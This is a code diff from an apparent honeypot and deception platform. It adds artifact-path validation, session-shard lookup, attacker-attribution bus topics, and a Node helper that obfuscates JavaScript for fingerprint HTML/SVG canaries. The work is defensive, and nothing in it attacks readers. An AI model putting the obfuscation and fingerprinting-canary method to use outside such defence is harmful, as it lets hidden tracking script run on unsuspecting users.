-    lans = hydrated["lans"]
-    compose_path = _topology_compose_path(topology_id)
-    client = docker.from_env()
-    # Bridges + compose are sync/blocking; hop to a thread so we don't
-    # stall the event loop on a slow docker daemon.
-    def _materialise() -> None:
-        for lan in lans:
-            net_name = _topology_network_name(topology_id, lan["name"])
-            internal = not lan["is_dmz"]
-            create_bridge_network(
-                client, net_name, lan["subnet"], internal=internal
-            )
-        write_topology_compose(hydrated, compose_path)
-        # ``--always-recreate-deps`` keeps service containers' netns shares
-        # fresh: every decky service joins its base's netns via
-        # ``network_mode: container:<base>``, and that share is bound at
-        # service start time. If a base is recreated (e.g. when ``ports:``
-        # changes after toggling ``forwards_l3``) but compose decides the
-        # services are unchanged, the services keep a stale netns FD
-        # pointing at the destroyed base — they end up in an empty
-        # namespace with only ``lo``, and external traffic hits a closed
-        # port on the live base. Forcing dependents to recreate alongside
-        # the base is the cheapest way to make this race impossible.
-        _compose_with_retry(
-            "up", "--build", "-d", "--always-recreate-deps",
-            compose_file=compose_path,
-        )
-    await asyncio.to_thread(_materialise)
+    topology_id = _check_hash_and_validate(hydrated, version_hash)
+    await _teardown_superseded(topology_id, store)
+    await asyncio.to_thread(_materialise, hydrated, topology_id)
     store.put(topology_id, version_hash, hydrated)
-    log.info(
-        "topology %s applied on agent (%d LANs)", topology_id, len(lans)
-    )
+    log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))


 async def teardown(
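
The refactor above passes a module-level blocking function and its arguments to `asyncio.to_thread` instead of closing over local variables. A small sketch of that pattern follows, assuming a stand-in `blocking_materialise` function (hypothetical, it only sleeps) in place of the real docker and compose calls.

```python
import asyncio
import threading
import time


def blocking_materialise(topology_id: str) -> str:
    """Stand-in for slow, synchronous docker/compose work (hypothetical)."""
    time.sleep(0.05)
    return f"{topology_id} on {threading.current_thread().name}"


async def apply(topology_id: str) -> tuple[str, str]:
    # The event loop thread stays free while the worker thread blocks.
    loop_thread = threading.current_thread().name
    result = await asyncio.to_thread(blocking_materialise, topology_id)
    return loop_thread, result


loop_thread, result = asyncio.run(apply("topo-1"))
print(loop_thread, "->", result)
```

Passing arguments explicitly keeps the blocking function testable on its own, without constructing the surrounding coroutine.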

View File

@@ -63,6 +63,7 @@ class TopologyStore:
        # The agent is single-process, so there's no real contention —
        # sqlite's own connection lock is enough.
        self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
        self._conn.row_factory = sqlite3.Row
        self._conn.execute(
            "CREATE TABLE IF NOT EXISTS applied_topology ("
            " topology_id TEXT PRIMARY KEY,"
@@ -84,11 +85,11 @@ class TopologyStore:
         if row is None:
             return None
         return AppliedRow(
-            topology_id=row[0],
-            applied_version_hash=row[1],
-            hydrated=json.loads(row[2]),
-            applied_at=int(row[3]),
-            last_error=row[4],
+            topology_id=row["topology_id"],
+            applied_version_hash=row["applied_version_hash"],
+            hydrated=json.loads(row["hydrated_blob_json"]),
+            applied_at=int(row["applied_at"]),
+            last_error=row["last_error"],
         )

     # ---------------------------------------------------------------- writes
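
The switch from positional indexes to column names relies on `sqlite3.Row`. A minimal sketch with an in-memory database and a trimmed-down table (the three columns and sample values here are illustrative, not the full `applied_topology` schema):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.row_factory = sqlite3.Row  # rows now support lookup by column name
conn.execute(
    "CREATE TABLE applied_topology ("
    " topology_id TEXT PRIMARY KEY,"
    " applied_version_hash TEXT,"
    " applied_at INTEGER)"
)
conn.execute(
    "INSERT INTO applied_topology VALUES (?, ?, ?)",
    ("topo-1", "abc123", 1700000000),
)

# The SELECT order deliberately differs from the table definition:
# name-based access still returns the right column, index-based does not.
row = conn.execute(
    "SELECT applied_at, topology_id, applied_version_hash FROM applied_topology"
).fetchone()

by_name = row["topology_id"]
by_index = row[0]
print(by_name, by_index)
conn.close()
```

Name-based access keeps the reader correct if the column list in the query is ever reordered or extended.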

View File

@@ -0,0 +1 @@
"""Artifact storage helpers shared between the web router and TTP workers."""

86
decnet/artifacts/paths.py Normal file

@@ -0,0 +1,86 @@
"""
Shared on-disk artifact path resolution.

Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
quarantine tree:

    /var/lib/decnet/artifacts/{decky}/{service}/{stored_as}

Two callers need to translate ``(decky, stored_as, service)`` into a
concrete ``Path`` rooted under that tree:

* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
  (``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
  download for the dashboard.
* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
  reads the stored ``.eml`` at tag-time so body-aware predicates
  (R0047 BEC, R0048 macro) don't need raw body text on the bus.

Both callers share the same validation rules and the same
defence-in-depth symlink-escape check; this module is the single
implementation. It is auth-agnostic — wrappers layer authentication
where appropriate (the router does ``require_admin``, the lifter does
not).
"""
from __future__ import annotations

import os
import re
from pathlib import Path

# decky names come from the deployer — lowercase alnum plus hyphens.
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")

# Services that own an artifacts subdir. Kept explicit so a caller
# can't pivot into arbitrary subpaths via a query string or bus payload.
_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})

# stored_as is assembled by the capturing template as:
#   ${ts}_${sha:0:12}_${base}
# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
# and base is the original filename's basename. Keep the filename charset
# tight but allow common punctuation dropped files actually use.
_STORED_AS_RE = re.compile(
    r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
)

# Module-level so tests can monkeypatch. Override via env in production
# (the systemd unit sets this) — the prod path matches the bind mount
# declared in decnet/services/{ssh,smtp}.py.
ARTIFACTS_ROOT = Path(
    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
)


class ArtifactPathError(ValueError):
    """Raised when (decky, stored_as, service) fails validation or escapes
    the artifacts root.

    The router catches this and re-raises HTTPException(400). The lifter
    catches it and treats the event as having no body available (no-tag).
    """


def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
    """Validate inputs, resolve the on-disk path, and confirm it stays
    inside the artifacts root.

    Raises :class:`ArtifactPathError` on any violation. Does NOT check
    that the file exists — callers handle that distinctly (404 for the
    router, no-tag for the lifter).
    """
    if service not in _ALLOWED_SERVICES:
        raise ArtifactPathError("invalid service")
    if not _DECKY_RE.fullmatch(decky):
        raise ArtifactPathError("invalid decky name")
    if not _STORED_AS_RE.fullmatch(stored_as):
        raise ArtifactPathError("invalid stored_as")
    root = ARTIFACTS_ROOT.resolve()
    candidate = (root / decky / service / stored_as).resolve()
    # defence-in-depth: even though the regexes reject `..`, make sure a
    # symlink or weird filesystem state can't escape the root.
    if root not in candidate.parents and candidate != root:
        raise ArtifactPathError("path escapes artifacts root")
    return candidate
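
The symlink-escape check at the end of `resolve_artifact_path` can be illustrated in isolation. The sketch below assumes a POSIX filesystem where creating symlinks is permitted; the `is_inside` helper and the temporary directory layout are hypothetical and only mirror the `root in candidate.parents` test.

```python
import os
import tempfile
from pathlib import Path


def is_inside(root: Path, candidate: Path) -> bool:
    """True if candidate, with symlinks resolved, stays under root."""
    return root.resolve() in candidate.resolve().parents


with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp) / "artifacts"
    outside = Path(tmp) / "outside"
    (root / "decky-1" / "ssh").mkdir(parents=True)
    outside.mkdir()
    (outside / "secret").write_text("not an artifact")

    # An ordinary file stored inside the tree.
    regular = root / "decky-1" / "ssh" / "payload"
    regular.write_text("captured data")

    # A symlink planted inside the tree that points outside it.
    link = root / "decky-1" / "ssh" / "escape"
    os.symlink(outside / "secret", link)

    regular_ok = is_inside(root, regular)
    link_ok = is_inside(root, link)

print(regular_ok, link_ok)
```

A name-only regex check would pass `escape`; resolving first is what exposes the real target.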

129
decnet/artifacts/shards.py Normal file

@@ -0,0 +1,129 @@
"""Shared asciinema shard helpers.
Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
so non-router callers (the BEHAVE-SHELL session-ended handler in
``decnet/profiler/worker.py``, the collector's session aggregator)
can resolve shard paths without crossing the layer boundary into the
FastAPI router.
Functions here speak in :class:`ValueError` — callers that want HTTP
semantics translate at the boundary. The router wrappers keep their
existing ``HTTPException`` behaviour for backwards compatibility.
PII boundary unchanged: shards live on disk; this module returns
:class:`pathlib.Path` pointers, never byte content. The ``_get_index``
cache stores byte offsets only.
"""
from __future__ import annotations
import os
import re
from collections import OrderedDict
from pathlib import Path
ARTIFACTS_ROOT = Path(
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
)
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
# (path, mtime_ns) → {sid: [(offset, length), ...]}
_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
OrderedDict()
)
_CACHE_MAX = 32
def validate_names(decky: str, service: str) -> None:
"""Raise :class:`ValueError` if ``decky`` / ``service`` look forged."""
if not _DECKY_RE.fullmatch(decky):
raise ValueError(f"invalid decky name: {decky!r}")
if not _SERVICE_RE.fullmatch(service):
raise ValueError(f"invalid service: {service!r}")
def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
"""Resolve ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``
with escape-attempt detection. Raises :class:`ValueError` on
invalid inputs.
"""
validate_names(decky, service)
if not _SHARD_BASENAME_RE.fullmatch(shard_name):
raise ValueError(f"invalid shard name: {shard_name!r}")
root = ARTIFACTS_ROOT.resolve()
candidate = (root / decky / service / "transcripts" / shard_name).resolve()
if root not in candidate.parents and candidate != root:
raise ValueError(f"path escapes artifacts root: {candidate}")
return candidate
def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
index: dict[str, list[tuple[int, int]]] = {}
with path.open("rb") as f:
offset = 0
for line in f:
length = len(line)
m = _SID_LINE_RE.search(line)
if m:
sid = m.group(1).decode("ascii")
index.setdefault(sid, []).append((offset, length))
offset += length
return index
def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
    """Return ``(sid → [(offset, length), …], file_size)``.

    Cached by ``(path, mtime_ns)``; rebuilt when the shard changes.
    """
    st = path.stat()
    key = (str(path), st.st_mtime_ns)
    if key in _INDEX_CACHE:
        _INDEX_CACHE.move_to_end(key)
        return _INDEX_CACHE[key], st.st_size
    index = _build_index(path)
    _INDEX_CACHE[key] = index
    _INDEX_CACHE.move_to_end(key)
    while len(_INDEX_CACHE) > _CACHE_MAX:
        _INDEX_CACHE.popitem(last=False)
    return index, st.st_size
def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
    """Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
    transcripts dir until one claims this ``sid``.

    Newest shards first — most lookups are for recent sessions. Caches
    the per-shard sid index, so repeated calls are ~free until the
    shard's mtime changes.

    Returns ``None`` when nothing claims the sid OR when the
    transcripts dir is missing / unreadable. Never raises on
    filesystem-level errors — callers treat ``None`` as "skip".
    """
    validate_names(decky, service)
    root = ARTIFACTS_ROOT.resolve()
    transcripts_dir = (root / decky / service / "transcripts").resolve()
    if root not in transcripts_dir.parents:
        return None
    try:
        if not transcripts_dir.is_dir():
            return None
        entries = list(transcripts_dir.iterdir())
    except (OSError, PermissionError):
        return None
    shards = sorted(
        (p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
        reverse=True,
    )
    for shard in shards:
        try:
            index, _size = get_index(shard)
        except (OSError, PermissionError):
            continue
        if sid in index:
            return shard
    return None
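The byte-offset index used by this module can be exercised in isolation. The following is a simplified, self-contained sketch rather than the module's own code: `build_index` and `read_session` are hypothetical names, the sid values are made up, and the shard is a throwaway temp file. It shows why recording `(offset, length)` per line lets a reader seek straight to one session's records instead of rescanning the shard.

```python
import json
import re
import tempfile
from pathlib import Path

# Same shape as the module's pattern: a 36-char lowercase hex/dash sid.
SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')


def build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
    """Map each sid to the (offset, length) of every line that mentions it."""
    index: dict[str, list[tuple[int, int]]] = {}
    offset = 0
    with path.open("rb") as f:
        for line in f:
            m = SID_LINE_RE.search(line)
            if m:
                sid = m.group(1).decode("ascii")
                index.setdefault(sid, []).append((offset, len(line)))
            offset += len(line)
    return index


def read_session(path: Path, spans: list[tuple[int, int]]) -> list[dict]:
    """Seek to each recorded span and parse only those lines."""
    records = []
    with path.open("rb") as f:
        for offset, length in spans:
            f.seek(offset)
            records.append(json.loads(f.read(length)))
    return records


# Made-up 36-character sids (8 + 16 + 12 characters).
SID_A = "0" * 8 + "-0000-0000-0000-" + "0" * 11 + "a"
SID_B = "0" * 8 + "-0000-0000-0000-" + "0" * 11 + "b"

with tempfile.TemporaryDirectory() as tmp:
    shard = Path(tmp) / "sessions-2026-05-16.jsonl"
    rows = [
        {"sid": SID_A, "cmd": "whoami"},
        {"sid": SID_B, "cmd": "ls"},
        {"sid": SID_A, "cmd": "uname -a"},
    ]
    shard.write_bytes("".join(json.dumps(r) + "\n" for r in rows).encode("utf-8"))
    index = build_index(shard)
    commands_a = [r["cmd"] for r in read_session(shard, index[SID_A])]
```

Keying the cache on `(path, mtime_ns)` as the module does means a shard that is appended to gets a fresh index on the next lookup, while untouched shards keep being served from memory.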


@@ -13,7 +13,7 @@ from typing import Sequence
 from decnet.asn.base import Provider
 from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
 from decnet.asn.iptoasn.parse import parse_file
-from decnet.asn.lookup import AsnLookup
+from decnet.asn.lookup import AsnLookup, Range
 from decnet.asn.paths import ensure_root

 logger = logging.getLogger("decnet.asn.iptoasn.provider")
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
                 "asn.iptoasn: cache load failed, rebuilding: %s", exc
             )

-        ranges = []
+        ranges: list[Range] = []
         for path in self.data_paths():
             if not path.exists():
                 continue


@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
     up at all we no-op.
     """
     try:
-        from decnet.telemetry import wrap_repository  # type: ignore[attr-defined]
+        from decnet.telemetry import wrap_repository
     except ImportError:
         return bus
     try:


@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
     contract the rest of this module already upholds.
     """
     if bus is None:
-        return lambda _topic, _payload, _event_type="": None
+        return lambda _topic, _payload, _event_type="": None  # type: ignore[misc]

     def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
         # Stream threads may keep draining after the bus owner closed it


@@ -17,6 +17,7 @@ Token structure (NATS-style, dot-separated):
     attacker.scored
     attacker.session.started
     attacker.session.ended
+    attacker.observation.{primitive}
     identity.formed
     identity.observation.linked
     identity.merged
@@ -28,12 +29,18 @@ Token structure (NATS-style, dot-separated):
     campaign.unmerged
     credential.captured
     credential.reuse.detected
+    attribution.profile.state_changed
+    attribution.profile.multi_actor_suspected
     canary.{token_id}.triggered
     canary.{token_id}.placed
     canary.{token_id}.revoked
     system.log
     system.bus.health
     system.{worker}.health
+    email.received
+    ttp.tagged
+    ttp.rule.fired.{technique_id}
+    ttp.rule.suppressed

 Wildcards (per :func:`decnet.bus.base.matches`):
@@ -52,8 +59,12 @@ IDENTITY = "identity"
 CAMPAIGN = "campaign"
 SYSTEM = "system"
 CREDENTIAL = "credential"
+ATTRIBUTION = "attribution"
 ORCHESTRATOR = "orchestrator"
 CANARY = "canary"
+SMTP = "smtp"
+EMAIL = "email"
+TTP = "ttp"


 # ─── Leaf event-type constants (the last segment of each topic) ──────────────
@@ -83,6 +94,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
 # syslog sidechannel too) to interleave substrate-change markers into
 # attacker traversals.
 DECKY_MUTATION = "mutation"
+# Per-service add/remove on a deployed decky (live; no full redeploy).
+# Payload carries ``decky_name``, ``service_name``, optional
+# ``topology_id``, and ``services`` (the post-mutation list). Consumers
+# that watch substrate shape (correlator, dashboard, profiler) reconcile
+# off these without waiting for the next decnet-state.json snapshot.
+DECKY_SERVICE_ADDED = "service_added"
+DECKY_SERVICE_REMOVED = "service_removed"
+# Per-service config change (the schema-driven Inspector form). Payload
+# carries ``decky_name``, ``service_name``, optional ``topology_id``,
+# ``service_config`` (the new validated dict), and ``recreated`` — true
+# when the operator hit Apply (container was force-recreated to pick up
+# the new env), false when they only hit Save (DB-only).
+DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"

 # Attacker event types (second token under the ``attacker`` root). First
 # sighting, session boundary transitions, and score-threshold crossings
@@ -94,6 +118,14 @@ ATTACKER_SCORED = "scored"
 # Distinct from ``observed`` which is the correlator's first-sight signal —
 # a fingerprint is additional evidence about an already-observed attacker.
 ATTACKER_FINGERPRINTED = "fingerprinted"
+# Published when the prober observes a NEW hash for an
+# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
+# attacker rotated their VPS, rebuilt their SSH server, swapped their
+# TLS cert. Distinct from ``fingerprinted`` which fires on every probe
+# result; ``fingerprint_rotated`` fires only on diff and carries both
+# old_hash + new_hash. Producer: prober (via the rotation library);
+# consumers: dashboard, forensics, attribution clustering.
+ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
 ATTACKER_SESSION_STARTED = "session.started"
 ATTACKER_SESSION_ENDED = "session.ended"
 # Published by the ``decnet enrich`` worker after an enrichment pass
@@ -101,6 +133,19 @@ ATTACKER_SESSION_ENDED = "session.ended"
 # returned a verdict). Payload carries the aggregate verdict + per-
 # provider summary so SIEM-bound webhooks don't need to re-query the DB.
 ATTACKER_INTEL_ENRICHED = "intel.enriched"
+# Per-primitive BEHAVE-SHELL observation. Full topic shape:
+#     attacker.observation.<primitive>
+# e.g. ``attacker.observation.motor.input_modality``. Producer:
+# ``decnet/profiler/behave_shell/`` (extractor library called from the
+# profiler worker on ``attacker.session.ended``); consumers: dashboard
+# SSE relay, attribution engine state machine, federation gossip
+# (post-v0). See development/BEHAVE-INTEGRATION.md §"Bus topics" for
+# the wire-format contract — the prefix is documentation + pattern
+# match only; bus auth is socket file perms (DEBT-029 §2), not
+# topic-level. The ``primitive`` segment MAY contain dots
+# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
+# rule that ``attacker.session.ended`` uses.
+ATTACKER_OBSERVATION_PREFIX = "observation"

 # Identity-resolution event types (second/third tokens under ``identity``).
 # Published by the (future) clusterer worker — see
@@ -168,6 +213,42 @@ CAMPAIGN_UNMERGED = "unmerged"
 CREDENTIAL_CAPTURED = "captured"
 CREDENTIAL_REUSE_DETECTED = "reuse.detected"
+
+# Attribution-engine event types (second/third tokens under
+# ``attribution``). Published by the v0 attribution worker
+# (``decnet.correlation.attribution_worker``) which subscribes to
+# ``attacker.observation.>`` and runs the per-(identity, primitive)
+# state machine. See ``development/ATTRIBUTION-ENGINE.md``.
+#
+#   attribution.profile.state_changed         — per-primitive state
+#                                               transition (e.g.
+#                                               stable → drifting).
+#                                               Payload: identity_uuid,
+#                                               primitive, old_state,
+#                                               new_state, current_value,
+#                                               confidence,
+#                                               observation_count, ts.
+#   attribution.profile.multi_actor_suspected — fires when ≥ 2
+#                                               primitives flag the same
+#                                               identity as multi_actor
+#                                               concurrently. Cross-
+#                                               primitive correlator;
+#                                               single-primitive
+#                                               multi_actor is too noisy
+#                                               on its own. Payload:
+#                                               identity_uuid, primitives,
+#                                               evidence_summary,
+#                                               confidence, ts.
+#
+# These are *derived* signals — distinct from
+# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
+# ``attacker.observation.*`` (raw extractor envelopes,
+# BEHAVE-INTEGRATION.md). The three families compose: observations feed
+# the attribution engine, the engine emits derived state, the clusterer
+# reads observations + state to form / merge identities.
+ATTRIBUTION_PROFILE_PREFIX = "profile"
+ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
+ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"

 # Canary-token event types (third token under ``canary``).
 #
 #   canary.{token_id}.placed — orchestrator/API successfully planted a
@@ -231,6 +312,43 @@ WORKER_CONTROL_START = "start"
 # of patterns. Payload is currently empty; consumers only need the signal.
 WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
+
+# Email-receipt event — fired by smtp / smtp-relay services on full-message
+# receipt (envelope + headers + body + attachments captured). Single-token
+# leaf so the bus tokenizer accepts it directly under the ``email`` root.
+# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
+# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
+# counts, header names, and rcpt-domain sets — never rcpt addresses or body
+# bytes.
+EMAIL_RECEIVED = "received"
+
+# TTP-tagging event types (second/third tokens under ``ttp``).
+#
+#   ttp.tagged                    — one or more new tags written. Published
+#                                   only when ``INSERT OR IGNORE`` wrote at
+#                                   least one new row; idempotent
+#                                   re-evaluations publish nothing
+#                                   (loop-prevention invariant — see
+#                                   TTP_TAGGING.md).
+#   ttp.rule.fired.{technique_id} — per-technique fan-out for SIEM
+#                                   consumers that subscribe to a single
+#                                   technique. Topic key is the parent
+#                                   technique; sub_technique is in the
+#                                   payload. Built via :func:`ttp_rule_fired`.
+#   ttp.rule.suppressed           — rule fired but the tag was dropped
+#                                   (confidence below floor, rate-limited,
+#                                   or the rule's RuleState was disabled).
+#                                   Observability signal for the dashboard.
+#
+# Per-rule reload + state-change topics. Built via
+# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
+# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
+# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
+TTP_TAGGED = "tagged"
+TTP_RULE_FIRED = "rule.fired"
+TTP_RULE_SUPPRESSED = "rule.suppressed"
+TTP_RULE_RELOADED = "rule.reloaded"
+TTP_RULE_STATE = "rule.state"


 # ─── Builders ────────────────────────────────────────────────────────────────
@@ -301,6 +419,42 @@ def attacker(event_type: str) -> str:
     return f"{ATTACKER}.{event_type}"


+def attacker_observation(primitive: str) -> str:
+    """Build ``attacker.observation.<primitive>``.
+
+    *primitive* is the fully-qualified BEHAVE-SHELL primitive path
+    (e.g. ``motor.input_modality``,
+    ``cognitive.feedback_loop_engagement``,
+    ``motor.shell_mastery.tab_completion``). Dotted primitives are
+    permitted — this matches the format
+    ``behave_shell.spec.event_adapter.event_topic_for`` produces
+    upstream, and DECNET's bus admits the dotted leaf the same way
+    :func:`attacker` does for ``session.started``.
+
+    Empty string is rejected so a downstream typo doesn't ship as
+    ``attacker.observation.``.
+    """
+    if not primitive:
+        raise ValueError(
+            "attacker_observation topic requires a non-empty primitive",
+        )
+    return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
+
+
+def attribution(event_type: str) -> str:
+    """Build ``attribution.<event_type>``.
+
+    *event_type* is typically one of
+    :data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
+    :data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED` — both contain a
+    dot (``profile.state_changed``) which is permitted under the same
+    "trailing dotted leaf" rule that ``attacker.session.started`` uses.
+    """
+    if not event_type:
+        raise ValueError("attribution topic requires a non-empty event_type")
+    return f"{ATTRIBUTION}.{event_type}"
+
+
 def campaign(event_type: str) -> str:
     """Build ``campaign.<event_type>``.
@@ -381,6 +535,86 @@ def system_control(worker: str) -> str:
     return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"


+def smtp(event_type: str) -> str:
+    """Build ``smtp.<event_type>``.
+
+    *event_type* may contain dots (e.g. ``probe.pending``).
+    """
+    if not event_type:
+        raise ValueError("smtp topic requires a non-empty event_type")
+    return f"{SMTP}.{event_type}"
+
+
+def email_topic(event_type: str) -> str:
+    """Build ``email.<event_type>``.
+
+    Named ``email_topic`` rather than ``email`` to avoid shadowing the
+    Python ``email`` stdlib package at import sites that pull both.
+    *event_type* is typically :data:`EMAIL_RECEIVED`.
+    """
+    if not event_type:
+        raise ValueError("email topic requires a non-empty event_type")
+    return f"{EMAIL}.{event_type}"
+
+
+def ttp(event_type: str) -> str:
+    """Build ``ttp.<event_type>``.
+
+    *event_type* is typically one of :data:`TTP_TAGGED`,
+    :data:`TTP_RULE_FIRED`, or :data:`TTP_RULE_SUPPRESSED`. Dotted
+    leaves (``rule.fired``) are permitted — same rationale as
+    :func:`system`. For per-technique fan-out use
+    :func:`ttp_rule_fired`.
+    """
+    if not event_type:
+        raise ValueError("ttp topic requires a non-empty event_type")
+    return f"{TTP}.{event_type}"
+
+
+def ttp_rule_fired(technique_id: str) -> str:
+    """Build ``ttp.rule.fired.<technique_id>``.
+
+    Per-technique fan-out: SIEM subscribers can listen on
+    ``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
+    one technique. *technique_id* is validated as a single segment —
+    sub-techniques like ``T1110.001`` are rejected because they would
+    split into two tokens. The topic key is the parent technique;
+    ``sub_technique_id`` lives in the payload.
+    """
+    _reject_tokens(technique_id)
+    return f"{TTP}.rule.fired.{technique_id}"
+
+
+def ttp_rule_reloaded(rule_id: str) -> str:
+    """Build ``ttp.rule.reloaded.<rule_id>``.
+
+    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
+    when a rule's *definition* changes (YAML edit on the filesystem
+    backend, ``ttp_rule`` row update on the database backend). One event
+    per per-rule edit — never batched (the "incremental, never batched"
+    property in TTP_TAGGING.md §"Bus topics" inherits its granularity
+    from :meth:`RuleStore.subscribe_changes`).
+
+    Subscribers: ``ttp.rule.reloaded.>`` for every rule,
+    ``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
+    single segment.
+    """
+    _reject_tokens(rule_id)
+    return f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
+
+
+def ttp_rule_state(rule_id: str) -> str:
+    """Build ``ttp.rule.state.<rule_id>``.
+
+    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
+    when a rule's *operational state* changes (operator hits the disable
+    button, an ``expires_at`` TTL fires and auto-reverts the state).
+    *rule_id* is validated as a single segment.
+    """
+    _reject_tokens(rule_id)
+    return f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
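The single-segment rule that the per-technique and per-rule builders rely on can be illustrated with a small standalone sketch. `reject_tokens` and `matches` below are hypothetical stand-ins written for this example: the body of the real `_reject_tokens` is not shown in this diff, and the matcher assumes conventional NATS wildcard semantics (`*` for exactly one token, `>` for one or more trailing tokens) rather than reproducing `decnet.bus.base.matches`.

```python
TTP = "ttp"


def reject_tokens(*parts: str) -> None:
    """Hypothetical validator: each part must be one non-empty NATS token."""
    for part in parts:
        if not part or any(ch in part for ch in ".*> \t"):
            raise ValueError(f"invalid topic segment: {part!r}")


def ttp_rule_fired(technique_id: str) -> str:
    """Build ``ttp.rule.fired.<technique_id>`` from a single-segment id."""
    reject_tokens(technique_id)
    return f"{TTP}.rule.fired.{technique_id}"


def matches(pattern: str, topic: str) -> bool:
    """Assumed NATS-style match: ``*`` = one token, ``>`` = 1+ trailing tokens."""
    p_tokens = pattern.split(".")
    t_tokens = topic.split(".")
    for i, p in enumerate(p_tokens):
        if p == ">":
            # ``>`` must be the last pattern token and consume at least one token.
            return i == len(p_tokens) - 1 and len(t_tokens) > i
        if i >= len(t_tokens):
            return False
        if p != "*" and p != t_tokens[i]:
            return False
    return len(p_tokens) == len(t_tokens)


topic = ttp_rule_fired("T1110")

try:
    ttp_rule_fired("T1110.001")  # the dot would split the id into two tokens
    sub_technique_rejected = False
except ValueError:
    sub_technique_rejected = True
```

Under these assumptions a subscriber on `ttp.rule.fired.>` receives every technique, while one on `ttp.rule.fired.T1110` receives only that parent technique, which is why the sub-technique has to travel in the payload.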
def _reject_tokens(*parts: str) -> None: def _reject_tokens(*parts: str) -> None:
"""Reject topic segments that would break NATS-style tokenization. """Reject topic segments that would break NATS-style tokenization.


@@ -0,0 +1,18 @@
// Node helper invoked by decnet.canary.obfuscator.
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
// Kept dependency-light on purpose: only javascript-obfuscator.
const JsObf = require('javascript-obfuscator');
let raw = '';
process.stdin.setEncoding('utf8');
process.stdin.on('data', (chunk) => { raw += chunk; });
process.stdin.on('end', () => {
  try {
    const { code, options } = JSON.parse(raw);
    const result = JsObf.obfuscate(code, options || {});
    process.stdout.write(result.getObfuscatedCode());
  } catch (e) {
    process.stderr.write(String(e && e.stack || e));
    process.exit(2);
  }
});


@@ -100,6 +100,12 @@ class CanaryArtifact:
     planting. Never leaked to the attacker-facing surface.
     """

+    fingerprint_nonce: Optional[str] = None
+    """Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
+    else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
+    so the worker can validate incoming ``?k=`` params.
+    """
+

 class CanaryGenerator(ABC):
     """Produces a fake artifact from scratch."""


@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
     ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
     ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
     ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
+    ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
+    ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
 }
@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
     "honeydoc_pdf": "http",
